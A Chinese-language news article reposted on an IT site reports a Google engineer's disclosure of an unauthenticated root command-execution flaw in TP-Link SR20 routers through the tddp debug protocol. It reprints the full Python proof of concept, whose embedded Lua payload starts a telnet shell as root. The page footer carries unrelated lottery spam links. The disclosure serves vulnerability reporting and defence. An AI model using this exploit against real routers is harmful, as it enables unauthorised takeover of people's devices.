安基網 首頁 資訊 安全報 查看內容

TP-Link 不回應,Google安全工程師公開了其路由器漏洞

2020-7-29 13:57| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 此前 Google 安全工程師在 TP-Link 的 SR20 智能家居路由器上發現了一個允許從本地網絡連接執行任意命令的漏洞,他們將問題報告給 TP-Link,但是經過了 90 天還沒有得到官方的回應,于是他公開了該漏洞。該問題由著名的 Google 安全工程師與開源貢獻者 Matthew Garrett 披露,周三他公開的 38 行概念驗 ...

此前 Google 安全工程師在 TP-Link 的 SR20 智能家居路由器上發現了一個允許從本地網絡連接執行任意命令的漏洞,他們將問題報告給 TP-Link,但是經過了 90 天還沒有得到官方的回應,于是他公開了該漏洞。

該問題由著名的 Google 安全工程師與開源貢獻者 Matthew Garrett 披露,周三他公開的 38 行概念驗證代碼顯示出在利用 SR20 的漏洞時可以使用 root 權限執行設備上的任何命令,并且無需身份驗證。

TP-LINK是普聯技術有限公司旗下的品牌,成立于1996年,是專門從事網絡與通信終端設備研發、制造和行銷的業內主流廠商,也是國內少數幾家擁有完全獨立自主研發和制造能力的公司之一,創建了享譽全國的知名網絡與通信品牌:TP-LINK。是一家正處于高速發展和國際化進程中的國家級高新技術企業,公司總部坐落于深圳市高新技術產業園區內。

Matthew 解釋,TP-Link 路由器經常以 root 身份運行名為“tddp”(TP-Link Device Debug Protocol,TP-Link設備調試協議)的進程。它已經存在了多個漏洞,其中一個沒有身份驗證。

“SR20 暴露了一些第一個版本協議的命令,其中一個(命令 0x1f,請求 0x01)似乎是用于某種配置驗證”,他說:“你發送文件和相應參數,收到命令后,路由器通過 TFTP 響應請求的機器,詢問文件名,將其導入 Lua 解釋器,以 root 身份運行,并將參數發送到導入文件中的 config_test() 函數。Lua os.execute() 方法傳遞一個由操作系統 shell 執行的命令。”

由于解釋器以 root 身份運行,所以可以執行任意命令。

#!/usr/bin/python3
# Create /testfile in your tftp root directory with the following contents:
#
#function config_test(config)
# os.execute("telnetd -l /bin/login.sh")
#end
#
# Replace 192.168.0.1 with the IP address of the vulnerable device
import binascii
import socket
port_send = 1040
port_receive = 61000
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
packet = packet + b"/testfile;arbitrary"
print(packet)
sock_send.sendto(packet, ("192.168.0.1", port_send))
sock_send.close()
response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)




小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6854419217786241543/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
创业如何赚钱 股票投资必看十大书 北京快乐8单双预测 75秒极速赛车是谁开的 中国南车股票分析 湖北十一选五杀号技巧 十一运夺金开奖结果360 广西11选5官网 青海快三5oo期走势图 佳永配资 海南体彩4 1中奖新闻 1分快3官方开奖 幸运农场走势图农场版 幸运飞艇看号技巧图 稳赚 官方上海快三开奖查询 哪个武汉市哪里有炒股可以配资的 快3福彩开奖结果